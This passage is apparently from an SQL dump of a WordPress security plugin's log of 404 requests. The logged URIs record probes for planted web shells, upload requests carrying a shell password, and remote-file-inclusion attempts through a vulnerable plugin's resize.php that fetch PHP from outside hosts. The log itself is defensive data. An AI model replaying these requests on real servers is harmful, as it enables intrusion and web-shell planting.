(0xbcc9911f06c94198ef1c226d13c77d38, 1494094608, '/wp-includes/pomo/w7388n.php'),
(0x06793d27c0ac6c3608c7d09fb610c69a, 1494180531, '/mobile_detect.php'),
(0x886931eb498353dce98c50e874374d41, 1494247349, '/wp-includes/pomo/7313581d9a.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'),
(0x239a785171f8495a0fa1621fd64d460d, 1494368590, '/images/xxu.php'),
(0x7f9a10d16180bd722d9efad7c0a6b9af, 1494368591, '/x.php'),
(0x3d0cbefbd6bc6efcb00dc7227a81a490, 1494368592, '/images/1ndex.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x973a85c6f2a32ec5128d12b8c527db0e, 1494368626, '/sqlbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xb8f89d8b5147f1bb75cb631f40469d27, 1494368657, '/email.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x9651acbad80de27a384124eb8161acbb, 1494368678, '/functions.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x9bff7711eb994d96ea10a616f3e612e5, 1494368699, '/logs.asp?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xbb51b54585d0aefbd498376437c1b940, 1494368719, '/cache/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0xc4742ac0f3c70d6129b72ac6e36209a4, 1494368739, '/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x1691bac70591ef8db8fc9c26694c068e, 1494368768, '/shootme.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x41f38ca402258e65e6d703ab5fd20e87, 1494368803, '/configurationbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xb37b280f410345b1274fb54e248aef2a, 1494368841, '/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x75080563602ecef2e5a7d0dbbaa25396, 1494368865, '/jconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x71bcbbae326b97338f2fb31eb0c75b0f, 1494368901, '/media/reads.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d'),
(0x5f5d60806b2714dc36fddad1f81d0455, 1494368944, '/media/1ndex.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d'),
(0xa8471c0f9c910ad62506f45423d96712, 1494368987, '/sql_dump.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x5ae5cca6ea001dd62b3a2f554b1ea3b1, 1494369044, '/images/laj.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0xb390ac5b1730c0f2a854df597ac9e24f, 1494369079, '/media/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d'),
(0xc22d7bafef930379f1685d3b5a863afb, 1494369109, '/media/tmp.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L21lZGlhLw%3d%3d'),
(0x0553ddd7f0fdf37df1cc83a0daf1da81, 1494369172, '/r3x.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xf237af750bd08a9bdec6cb6a0b58383a, 1494369205, '/log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x47f10de3a0a0759f829adacbc935cdef, 1494369240, '/images/stories/0day.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy9zdG9yaWVzLw%3d%3d'),
(0x234bfaa849eda6dfce3f3accf40b3e84, 1494369259, '/includes/u2p.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2luY2x1ZGVzLw%3d%3d'),
(0x868f01368628eeaff0e35eb1eec626b0, 1494369287, '/images/xxx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0xbd89af56f344e3ae39f8de221945b154, 1494369316, '/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x39406a4718b695fa721a59bf2491c659, 1494369342, '/cache/cache_aqbmkwwx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0x4ce5aa01e9a24cfebe72d0c806b46f93, 1494369363, '/install.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xc77b1a32fb0b80f0591207d101efd6e8, 1494369378, '/dswat.org/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2Rzd2F0Lm9yZy8%3d'),
(0x84013b8b95bc7e593713858f770898dd, 1494369409, '/robot.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xb6b757b9af10afa58baced33fe37580f, 1494369418, '/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xe638cf649c3ca35fa2ce88f11bc5fefe, 1494369455, '/goog1es.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xc54d404ca4bd7d319e49e55630256128, 1494369481, '/site/tmp/cTivrC.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3NpdGUvdG1wLw%3d%3d'),
(0x9f9fb0d714ff3cf24bc721c587ff7a71, 1494369518, '/update.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xbb8d86309ed9b802f417165620e1a0cd, 1494369543, '/includes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xc04b5babd1115fed3df835f8fb8f7db9, 1494369577, '/wp-main.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x5ccc5c1cb31215577c7a5fe000cd36dd, 1494369601, '/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x012f72312d01bae2194ca7ecbe0d0b1d, 1494369632, '/images/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x334e78b61208de34a9293b2a010eff97, 1494369647, '/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x5562b8e3d1d57f761af7d2fd07c759b2, 1494369662, '/administrator/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv'),
(0xb768e68a78240284c698ac5c2468e55a, 1494369676, '/cache/cachee.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0x6b00e77f5319fd1ca6863598915e04ac, 1494369703, '/thumb.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xe5b6e5c2accd4bccc520844b98b81674, 1494369714, '/administrator/dbconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv'),
(0x6f6e832336f30adbf2043c2f8d9638b2, 1494369741, '/administrator/administrator.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv'),
(0x633d5fea66c73ac696dacef379bf60a5, 1494369770, '/SessionController.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x22c36e5bb2837f9688c8bdd78aa43820, 1494369796, '/maill.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x3e03d120c6346e0e6ba90d0584d15021, 1494369816, '/webconfig.txt.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xd996cba03ab077309a17137def18927d, 1494369838, '/error-log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x7027bbf62268bbbe5e6e3010187f6015, 1494369843, '/authenticating.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x2b9a2647e96c0662ee1c2c1a0d957071, 1494369866, '/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xff5d0e66d4b90691ac212c18808fb445, 1494369878, '/images/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x342a0ce1bcd6454d482279cfac7e55eb, 1494369898, '/images/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x1363c57d31eb7236c18bd1fd8f29fea2, 1494369920, '/elements.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x48459356ff5ba4ed27029cc26eb78a94, 1494369965, '/xmlsrpc.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x2f54cd80e534bac17d7e874b807de428, 1494370007, '/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x53e7a6d7def29bcc34386e8333cba7ec, 1494370048, '/images/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0xe708dc5d07f67766bfa58284b0367b76, 1494370077, '/images/head.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0xe6fa28b4ffa816130541bbb60aec85e8, 1494370097, '/cache/support.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0xc37db3dfdf4196df1bd452c2570a13f3, 1494370128, '/RoseLeif.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xc8424b31510804ba1ff7076809fb30c0, 1494370159, '/Abbrevsprl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x360933872199e2717177dcd03793df87, 1494370189, '/show.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x6b44aeb62168556fc6f0d679c204dd83, 1494370222, '/images/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d'),
(0x366b9bf044acc01749b58d42608ccb5e, 1494370235, '/cli/40dd1d.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NsaS8%3d'),
(0xc663ddadcb5d6d0107f9b096ce4228cb, 1494370268, '/administrator/includes/readmy.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3IvaW5jbHVkZXMv'),
(0x4bf8b4c8e52287f6778e2003dcea9438, 1494370291, '/infos.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x46521056c33ba1a90a83e159a1ee86e5, 1494370318, '/cache/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0x88661b6775d370ccdbac5897f27ad673, 1494370335, '/bookmark.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x60d4e38b8aab0bd38a8bdecb8ea79c40, 1494370370, '/configbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x902c3dd64e845f1fc07c3987437f3753, 1494370401, '/wp-data.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0x1a1a5512e2b4f91855f6e0a2ff557b85, 1494370420, '/wp-content/plugins/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x942172a3443d30ab918d6b22e3cf8ce2, 1494370441, '/wp-content/uploads/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8%3d'),
(0x114adccbe44d44804c341abcf4b8ca70, 1494370468, '/wp-content/plugins/myshe.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xb7128b935ef196f89dd5f4484a858f83, 1494370481, '/wp-content/plugins/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x290ae393533edb2c5e0ec67546714196, 1494370508, '/wp-content/plugins/wp-footers.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xe799c0035ced284d759e8e6f3778f865, 1494370516, '/wp-content/plugins/wpfootes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xadf9feedd7a495d39a2aeee45df857ac, 1494370525, '/wp-content/plugins/sql_dump.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x468c04df0739201f32462a0dc92c0767, 1494370529, '/wp-content/plugins/SocketIontrol.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x6f90ac4dbcf1b686d9b0dfd7d79684f2, 1494370568, '/wp-content/plugins/SocketIasrgasfontrol.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0x5ec2fdca98894c851acfcaa1d0fd8650, 1494370579, '/configurationbak.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d'),
(0xa8ebf090b0310ad1c403a05247676bd1, 1494370601, '/wp-content/plugins/Analyser.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d'),
(0xfc58b891731c28882d14e7b46de68857, 1494370622, '/cache/list.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d'),
(0xdc892b6aa76754fb74b5e4747fae668a, 1494370634, '/license.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x0f6b3de9b5485f74abf1e136906e0cf6, 1494370643, '/tmp/sfx.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xdd713979fa601b51f5b5ed27e1fd0c7e, 1494370645, '/up.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x76a2e0ac71d11af10d050317f3b2d46c, 1494370651, '/m.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xf42c57e17432f4a60efe7f7828754a05, 1494370660, '/ny.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x72eb35aa70f8fb594a0a286d6e130b15, 1494370662, '/tmp/guide.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x17868cc901368cbdc9035db18ec78c05, 1494370665, '/media/jss.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x46475fa46849e880fd57b34357dcd687, 1494370670, '/media/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xe2346b08e2ec5301dd82720a03e52cba, 1494370673, '/css.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xc8ba9c0dabecdcda0702e0b6a5082236, 1494370674, '/nktt.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xd20975b2c839c10b4d1deb20825d9815, 1494370683, '/zibi.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xa4bbb5c21494b67291e756f96e0fae83, 1494370688, '/u.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x2c5a974e834cee95a18800b00e1a7ebf, 1494370692, '/ws0.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x47969a33460b10f16ec87ea3a8b7f663, 1494370702, '/libraries/joomla/web.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xe4b5afcb9dd80ba8e9ba2aec3c72076b, 1494370710, '/active.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x6e6709db1e933de04d9442b4669b805b, 1494370720, '/images/stories/alfa.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xf94ca44cfcdc9fb89002fd7c23ed5061, 1494370729, '/images/stories/s.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x15d2bb054df105ff575da84c1b4b3dc7, 1494370741, '/images/stories/black.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xb27f6d1611cc412c63a7e2647d8c325d, 1494370750, '/images/logo_img.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x35b91e04b7fd70ec2bd7e94b2d126e12, 1494370755, '/images/p.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x11bee8c3bd7db31866f14526e2a578d8, 1494370761, '/help.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xc84df53d09629678d76b31ad36e36ab6, 1494370767, '/libraries/respectMuslims.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xd2b85f5b02490bdcc72526635557ea31, 1494370773, '/libraries/joomla/zipy.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xce7206fe71b4dbf577c8fc4745630566, 1494370774, '/tmp/pz.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xa176db1e76bbd7853cfdf055d2488496, 1494370780, '/go.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x2c1eaad29b3ad068dd8932339d439fa0, 1494370794, '/wp-configuration.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x043e9be7699540dff817055365758c82, 1494370802, '/images/stories/3xp.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x8f2987ad56e6dfbfc5a8a8da8d2576af, 1494371169, '/xup.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x0bc2ea3bb495691ecb2c56a678c721bc, 1494371177, '/zebda.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xe67b2ecad4f98fbaa1c3483f7e8b09dc, 1494371185, '/kk.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0xf50522df14907a55123d206aedf13173, 1494371190, '/wp_logns.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go%21&H='),
(0x95b500fe1349e59b2935d2eb939d2cc4, 1494483855, '/xmlrpc-blog.php'),
(0xa4032a487d033b5a8ee26b3244d1f2b4, 1494526827, '/customizer.php'),
(0xe8119f053a6c689a0e8b4cbb5ab1c561, 1494581761, '/wp-logs.php?action=test'),
(0x418606bfe7113d69b272d7f247c60594, 1494647531, '/wp-includes/css/style.css.php'),
(0x3fb618909cee081d2ebcc0bdfe3ed385, 1494727657, '/wp-content/uploads/2015/09/class-wp-upgrade.php'),
(0x696710168bec4862dc311c3736705561, 1494767536, '/cash.php'),
(0x9bb9d63c0d938aef80cb2047515f3d7a, 1494767539, '/cssf.php'),
(0x7554b6e76df18aacc0abc80335c74485, 1494767542, '/3caa.php'),
(0x44837ea02dc0e761113e0e7621bbca48, 1494767549, '/read.php'),
(0x58f0d5eca3916b1a2ffbccd73be61a1a, 1494767550, '/spy.php'),
(0xb8994bbb81d57d02c1f3343b7197e9fe, 1494767557, '/Matun.php'),
(0x2d48d9894c7e3d6e73194917bb4d0ec0, 1494767561, '/Ehxjfhv.php'),
(0x67804ea7728123367e244d502918c85b, 1494767565, '/ms-media.php'),
(0xb03fab2a1f1c0abe4df0597ebd26f9cd, 1494767568, '/Mydsvx.php'),
(0xd3eaa87f883572381cacf59c4a773fa1, 1494767583, '/wp-lop.php'),
(0xb5d35465ce9f2ba9422e39dc19993e18, 1494767585, '/Gmdrdtfh.php'),
(0x89cca595d4067119261645f4028fc574, 1494767588, '/c.php'),
(0xc4f6a4eae82f63c731b824a265715f32, 1494767589, '/wdphhaut.php'),
(0x273b321c33dea3523139acfd679af052, 1494791265, '/wp-content/plugins/revslider/temp/'),
(0xc4e8546fe53bec2bc14a388f8a734992, 1494815602, '/wp-content/plugins/woocommerce-catalog-enquiry/assets/frontend/js/chosen.js'),
(0xd0a53a3ce9abbfbd304e782f43205fa0, 1495490056, '/infos.php'),
(0x47e194b6ee611b0a900e882435e36795, 1495536195, '/eg.php'),
(0xdcd7f9a36e62597dd27222901d8b9c2d, 1495706633, '/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/'),
(0x32d6d1d2bf9369b2aae2ae06a32137d4, 1495712569, '/cdg.php'),
(0xc562609e38067ebff65aaab21f185390, 1495746816, '/wp-includes/Text/Temp.php'),
(0xd8b9539b3d936874254f445a723d6ade, 1495746816, '/wp-content/themes/gray-whale/db.php'),
(0x7b56892d06e7033828476b9b70ca5e8a, 1495746816, '/wp-includes/cache-template.php'),
(0xa7e98bc5e5eb5498f124f25e97088082, 1495746816, '/wp-admin/ms-head.php'),
(0xa6ad53ac49ab67b853b3ad16ba953cfb, 1495746816, '/wp-content/themes/theme/info.php'),
(0x4b56f0aea5f1bb09885d2e8ace4dfe8b, 1495746816, '/wp-includes/Text/Diff/class.php'),
(0x701c468114e315642b9a465355681d04, 1495847727, '/web/wp-admin/setup-config.php?step=1'),
(0x4747f3c8f9bf66be04c3382248f5d7bf, 1495847955, '/news/wp-admin/setup-config.php?step=1'),
(0xb4e656bfcee4221a6b584325f97bba30, 1495850718, '/wp-content/plugins/wysija-newsletters/readme.txt'),
(0xdfcc052ae0c183e82abcf82adcf80a49, 1495879501, '/wp-content/eg.php'),
(0x5799dfc5f4d81d9db3e5c3a4a8f5b97d, 1495927583, '/assets/images/iran78fzfzz.php'),
(0xef4cfe0ffcc2352d9179e7df45296941, 1495928434, '/assets/b374k-2.8.php'),
(0x7196ac9d1fcc4d45e5051df32fe8777b, 1495972784, '/wp-content/plugins/newsletter/js/Chart.min.js'),
(0xc4547fa84d4f6b12b75811a8f03e849b, 1495982160, '/wp-content/plugins/wp-mobile-detector/resize.php?src=http://91.103.217.68/~kettfusion/wp-content/redux/cache.php'),
(0x1b63de66af13ba498ea16b6584401ea1, 1495982161, '/wp-content/plugins/wp-mobile-detector/cache/cache.php'),
(0xcf3008211caacf3b700f4c003bf6ef6a, 1495982162, '/wp-content/plugins/revslider/temp/update_extract/revslider/cache.php'),
(0xc335a1e598894b4a212e4cf87c821c67, 1496013525, '/wp-content/plugins/flash-album-gallery/admin/css/flagSorter.css'),
(0x0ab32de6fcb3cf54da9df97e0edf84b7, 1496057541, '/wordpress/wp-admin/setup-config.php?step=1'),
(0xebe5a416122e4b4926cc46e689e9e617, 1496057843, '/test/wp-admin/setup-config.php?step=1'),
(0x8019da2216205f3d1da362833f45b19d, 1496058174, '/blog/wp-admin/setup-config.php?step=1'),
(0xb5bee1cc10d48a509396858faa63e77e, 1496060007, '/home/wp-admin/setup-config.php?step=1'),
(0x357692e28515f3ec7d3124f7cb1e46fa, 1496061060, '/wp/wp-admin/setup-config.php?step=1'),
(0xdc2d05729b44f863f5493042ed78f47d, 1496061861, '/new/wp-admin/setup-config.php?step=1'),
(0x092be86776913f385adf53e69affb504, 1496062410, '/cms/wp-admin/setup-config.php?step=1'),
(0xdfaa4db1d7627614a4bd09c42cad0e1e, 1496065151, '/main/wp-admin/setup-config.php?step=1'),
(0x3fb46a057a17d9346a9dca73ba7b7fcf, 1496070316, '/en/wp-admin/setup-config.php?step=1'),
(0x36feaad859eb274b77c5a6394da09b18, 1496248937, '/wp-content/plugins/zen-mobile-app-native/server/images.php'),
(0xbdbb0cccfeecf6291f0dbea3e1c01493, 1496248938, '/wp-content/plugins/webapp-builder/server/images.php'),
(0x3ade0f8dcc71913129660fd6176f38ab, 1496248939, '/wp-content/plugins/wp2android-turn-wp-site-into-android-app/server/images.php'),
(0xaccc18c3f9ba5af1299d71525d8f33cd, 1496248940, '/wp-content/plugins/mobile-app-builder-by-wappress/server/images.php'),
(0xd8cc2f690b88b93fd32ac102b58a6a8c, 1496248941, '/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/server/images.php'),
(0x34b33e8b8be42efc30fe17668309bb9b, 1496248941, '/wp-content/plugins/cysteme-finder/php/connector.php?wphome=./'),
(0x34faf681e107fc32320b833fbc252852, 1496407772, '/wp-pols.php'),
(0xaedbce0ac7baad473d91a1a2922f16dc, 1496440992, '/wp-content/plugins/etc.php'),
(0xbe3d0e1464cd95e1bf0d14b78b4682d5, 1496445236, '/wp-content/plugins/wp-db-ajax-made/wp-ajax.php.suspected'),
(0x49a006628df51974a5d17101c43b15ff, 1496449481, '/wp-content/plugins/wp-db-ajax-made1/wp-ajax.php'),
(0x16b48f40bc375c35376b2b19a52a235e, 1496449789, '/wp-includes/class-wp-contact.php'),
(0x3a27b658e814c976528f056cc5322ad4, 1496458420, '/wp-content/themes/kuma/db.php'),
(0xe95739bdd7303a54daebf7c49625b7d0, 1496458565, '/wp-content/plugins/js_composer/vendor/composer/config.php'),
(0x01f282fd457ef0e6b1a0310f4e56c035, 1496462618, '/wp-content/uploads/etc.php'),
(0x83b6ce241045cd33a95a629f4f3a24f7, 1496466884, '/wp-content/themes/kuma/figure.php'),
(0x50b7a704ebb05b661237fbcfd8b73834, 1496471731, '/wp-content/themes/sketch/content-wrapper.php'),
(0x6f65cab2ffbab00c0ea18e7340aeeb49, 1496472036, '/wp-content/plugins/wp_module/wp_msg.php'),
(0x9e80199f6f6daa8a196036ea7815fe96, 1496472155, '/wp-content/plugins/plugin/info.php'),
(0x454f458ee76e59d7d6cdec4cdf1f5556, 1496479887, '/wp-content/etc.php'),
(0xbd92e94d0af6e7f75e9ba2e3959266ab, 1496479978, '/wp-content/themes/clubblog/db.php'),
(0x73402dc5c74dc4e9bc01662d007b999b, 1496485915, '/jm-ajax/upload_file/');
INSERT INTO `www2_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0x198296fbab726a4f18c49ddbde380529, 1496508183, '/wp-conde.php'),
(0x4a5b0ef5ac48878542ef4e3be275cfc6, 1496590526, '/wp-content/plugins/wp-db-backup-made/system.php.suspected'),
(0xaf903dac68342b295fce7adaacb9105e, 1496618894, '/wp-content/themes/coraline/inc/gswych.php'),
(0x54858c46985114bb432d04a431d9e31b, 1496639234, '/gtde.php'),
(0xbb100ea6016602a38191a2d558dc6cbc, 1496717196, '/wp-content/wflogs/rules.php'),
(0x87163982fcfe527dd38e9fe457a63770, 1496796872, '/mtsah16837.txt'),
(0x114df04a167c5d50462f15ee970c9736, 1496884592, '/wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.laptopscreenrepair.net.au/search/cache.php'),
(0xb7c2b9df913878f9f2d4672b088dfca3, 1496904687, '/blog/xmlrpc.php'),
(0x699b99739af1922c95f400130086a9c3, 1497056294, '/hsgcxbf.php'),
(0xb54174b1e822af914b49199bc7b616ca, 1497056311, '/wp-content/plugins/easyrotator-for-wordpress/prv8.php'),
(0x86b0cfb99808354a15f6cc84785824ef, 1497056314, '/lol.php'),
(0x7d9312ca836e08fda6f63d469316c1e4, 1497056323, '/Wpwcwjqs.php'),
(0xafba916110f57e24328b9b06e7c2e0cc, 1497056327, '/ashdusc.php'),
(0x0cc2f75b8315b37048108b3da20d32a4, 1497056330, '/Maggis.php'),
(0xf84ff975bc98151b3be9d2cc366b86c7, 1497056334, '/imnus.php'),
(0x9181c74e348fc5a4184894bdc8420de4, 1497056338, '/Co0ds.php'),
(0x3a7c8e4e3bd67c2943e359700b0c2893, 1497056342, '/wp-xmlrpc.php'),
(0x848fd92f8689c562c6cf69099a894259, 1497056345, '/Xudfel.php'),
(0x619641e1f053214869492bd02b41ab6d, 1497056359, '/dep.php'),
(0x34ebe364fdfce9149e43bcec41d9d189, 1497056362, '/wp-content/indexx.php'),
